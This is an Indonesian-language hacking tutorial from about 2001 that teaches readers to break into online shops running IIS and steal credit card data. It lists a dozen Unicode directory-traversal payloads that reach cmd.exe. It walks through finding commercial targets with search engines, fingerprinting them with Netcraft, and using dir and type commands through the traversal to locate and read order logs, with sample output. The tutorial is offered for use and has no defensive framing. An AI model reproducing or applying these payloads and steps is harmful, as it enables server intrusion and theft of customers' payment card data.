( Ini Merupakan Sistem Manual Lho )

cari Info Credit Card Ver.1.0
BY #Jakarta_selatan Rozybaik 

 

LAngkah pemula ;

      Ok pertama siapkan  dua  buah explorer Kamu orang, yang satu untuk search engine site dan yang satu untuk penangkapan target yang telah di tambahkan unicode dan sebagai salah contoh mari kita gunakan target berikut:

contoh unicode yang selama ini  sering tembus lho:
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Untuk mencari unicode-nya mana yang tembus sebaiknya anda menggunakan scanner.Scanner yg bagus untuk pengguna windows adalah unicode scanner yang berupa script irc buatan CyberMad (yang penulis ketahui).
Selanjutnya kita dapat memulai .... gunakan search engine biasa kita dapat mencoba dalam site www.google.com atau www.altavista.com dan searchnya/pencariannya sendiri adalah semua yang berkenaan dengan dunia dagang , uang dll sebagainya dan sebagai contoh anda dapat mengisi search engine dengan Online Shoping atau yang lain nya.
Nah setelah kita dapat kan site site yang menjadi sasaran kita, check site tersebut di http://www.netcraft.com/ atau anda juga bisa memakai scannernya CyberMad untuk mengetahui System Operasi apa yang mereka gunakan. Jika menggunakan IIS/NT lanjutkan, selain itu lupakan tutorial ini.
Contoh :
Buka http://www.netcraft.com/ di browser satu, dan coba kamu orang scan target berikut : www.******.uk.com.
 
So anda akan melihat halaman netcraft seperti berikut ini atau anda dapat memasukkan target di kolom di bawah ini:

  Explore 27,585,726 web sites   2 Aug 2001
Simple Search: Search Tips
Example: site contains .microsoft.
Whats that Site running? | Whats that SSL Site running? | Add your site
Directory of c:\



06/30/00  12:18p                   356 ARCNTAG.LOG

01/23/00  10:18a                     0 AUTOEXEC.BAT

08/08/01  03:31p        <DIR>          CA_LIC

08/28/01  04:05p                   396 ClientArea.mdb.lnk

01/23/00  10:18a                     0 CONFIG.SYS

01/23/00  03:37p               153,718 dc2Logo.bmp

07/25/01  08:56a                   381 default.asp
Langkah selanjutnya adalah kita mencoba mencari log dari transaksi pada site tersebut yang biasanya menggunakan nama file order.log, order.csv dan sebagainya, jadi kita dir aja semua nama file yang mengandung kata order dengan menggunakan dir/s/a (syntax DOS). Maka syntaxnya di Unicode akan menjadi:
http://www.******.uk.com/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\*order*/s/a
Dan juga jangan lupa untuk mencoba cari di drive lainnya.
Maka akan terlihat seluruh nama file yang mengandung kata order di browser anda. Contoh nya ada berikut ini:
Directory of c:\Program Files\WinZip



04/19/00  09:00a                 8,655 ORDER.TXT

               1 File(s)          8,655 bytes

OK sebagai Example :::

Nah sekarang bagaimana cara melihat isi daripada file tersebut di Unicode ? Jawabnya gampang saja jika anda telah mahir dengan DOS, cukup dengan menggunakan syntax type
Jadi syntaxnya akan menjadi :
http://www.******.uk.com/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\Progra~1\WinZip\ORDER.TXT
Mungkin sebagian dari anda akan bertanya, ko C:\Program Files\ berubah menjadi C:\Progra~1\ ?
Emang jawabannya ada di atas! :P~
Ini dikarenakan apa yah ? Jawabannya karena system DOS mengenal penamaan file dengan format 8.3 (Saya kira hal ini gak perlu dibahas karena akan melenceng dari tujuan tutor ini). Yang jelas jika anda menemukan nama directory yang ada spasi coba gabungkan dan ambil 6 caracter pertama dan ditambah dengan caracter ~1

Berikut dua contoh hasil scanner dari pengecekan OS menggunakan scannernya CyberMad.

Scanner: URL (209.67.50.203 or www.supervmart.com) opened.
HTTP/1.1 200 OK
Date: Tue, 28 Aug 2001 15:21:12 GMT
Server: Apache/1.3.9 (Unix)
Keep-Alive: timeout=15, max=15

Scanner: URL (216.206.193.75 or www.clickztracker.com) opened.
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Tue, 28 Aug 2001 15:28:58 GMT
Location: http://www.befirst.com

Yang pertama servernya menggunakan Apache di platform Unix, sedangkan yang kedua menggunakan IIS/5.0 di platform Windows.

 

Langkah Ke-2 :

 Kalo Anda tidak dapat juga, kamu orang dapat contact langsung ama Foundernya Chennel #Jakarta_selatan.#jakarta-selatan

 

 Copyright@hacked by Rozy #Jakarta_selatan and Hackers Team

mailto: Hacked@byjun.org

   

1